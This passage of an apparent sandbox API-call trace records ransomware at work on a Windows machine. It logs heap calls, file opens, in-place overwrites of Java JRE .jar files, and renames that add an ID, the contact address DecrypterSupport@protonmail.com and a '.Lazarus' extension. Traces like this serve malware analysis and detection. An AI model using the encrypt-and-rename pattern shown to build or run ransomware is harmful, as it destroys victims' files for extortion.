(HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.768] AreFileApisANSI () returned 1 [0095.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0095.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75eb8 [0095.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x75eb8, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar") returned 53 [0095.768] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8bb82c9, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8bb82c9, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1166a99)) returned 1 [0095.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0095.768] AreFileApisANSI () returned 1 [0095.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x313f4e8, cbMultiByte=-1, lpWideCharStr=0x313f500, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0095.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0095.769] GetLastError () returned 0x0 [0095.769] SetLastError (dwErrCode=0x0) [0095.769] AreFileApisANSI () returned 1 [0095.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0095.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75cd8 [0095.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar") returned 53 [0095.769] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134e8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0095.769] GetFileType (hFile=0x368) returned 0x1 [0095.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0095.769] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3113594 | out: lpNewFilePointer=0x0) returned 1 [0095.769] ReadFile (in: hFile=0x368, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113570, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113570*=0x15000, lpOverlapped=0x0) returned 1 [0095.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f448 [0095.772] ReadFile (in: hFile=0x368, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x3113518*=0x1000, lpOverlapped=0x0) returned 1 [0095.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d630 [0095.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d648 [0095.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df50 [0095.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x4f220 [0095.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c058 [0095.773] GetLastError () returned 0x0 [0095.773] SetLastError (dwErrCode=0x0) [0095.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0095.773] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0095.774] WriteFile (in: hFile=0x368, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0095.774] WriteFile (in: hFile=0x368, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0095.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f448 | out: hHeap=0x20000) returned 1 [0095.774] CloseHandle (hObject=0x368) returned 1 [0095.774] AreFileApisANSI () returned 1 [0095.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0095.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75fa8 [0095.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x75fa8, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar") returned 53 [0095.774] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0095.775] GetFileType (hFile=0x368) returned 0x1 [0095.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0095.775] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x311357c | out: lpNewFilePointer=0x0) returned 1 [0095.775] ReadFile (in: hFile=0x368, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113558, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113558*=0x15000, lpOverlapped=0x0) returned 1 [0095.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f448 [0095.779] ReadFile (in: hFile=0x368, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113500, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x3113500*=0x1000, lpOverlapped=0x0) returned 1 [0095.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e228 [0095.779] GetLastError () returned 0x0 [0095.779] SetLastError (dwErrCode=0x0) [0095.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0095.780] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0095.780] WriteFile (in: hFile=0x368, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0095.780] WriteFile (in: hFile=0x368, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0095.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f448 | out: hHeap=0x20000) returned 1 [0095.780] CloseHandle (hObject=0x368) returned 1 [0095.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0095.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71960 [0095.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0095.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a790 [0095.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0095.781] AreFileApisANSI () returned 1 [0095.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0095.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75cd8 [0095.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar") returned 53 [0095.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 115 [0095.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe6) returned 0x4ebc8 [0095.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a790, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=115 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 115 [0095.781] MoveFileExW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwFlags=0x2) returned 1 [0095.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0095.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0095.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0095.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d648 | out: hHeap=0x20000) returned 1 [0095.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d630 | out: hHeap=0x20000) returned 1 [0095.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0095.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c058 | out: hHeap=0x20000) returned 1 [0095.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0095.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0095.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0095.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0095.782] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.782] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.782] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa8546b2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xaa8546b2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xaa8ed01b, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x21a46d, dwReserved0=0x403aa0b9, dwReserved1=0xaec2c22b, cFileName="localedata.jar", cAlternateFileName="LOCALE~1.JAR")) returned 1 [0095.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0095.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0095.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0095.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0095.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0095.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0095.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0095.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0095.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0095.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0095.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0095.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a238 [0095.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0095.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ecf0 [0095.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0095.783] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.783] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.783] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.783] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0095.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.783] AreFileApisANSI () returned 1 [0095.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar", lpUsedDefaultChar=0x0) returned 58 [0095.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0095.783] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.783] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0095.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0095.783] AreFileApisANSI () returned 1 [0095.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0095.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a430 [0095.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a430, cchWideChar=58 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar") returned 58 [0095.783] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\localedata.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0095.784] GetFileType (hFile=0x368) returned 0x1 [0095.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0095.784] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0095.784] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0095.784] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0095.785] CloseHandle (hObject=0x368) returned 1 [0095.785] AreFileApisANSI () returned 1 [0095.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0095.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a430 [0095.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a430, cchWideChar=58 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar") returned 58 [0095.785] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\localedata.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0095.785] GetFileType (hFile=0x368) returned 0x1 [0095.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0095.785] CloseHandle (hObject=0x368) returned 1 [0095.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0095.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0095.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.786] AreFileApisANSI () returned 1 [0095.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0095.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a9b0 [0095.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=58 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar") returned 58 [0095.786] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\localedata.jar"), fInfoLevelId=0x0, 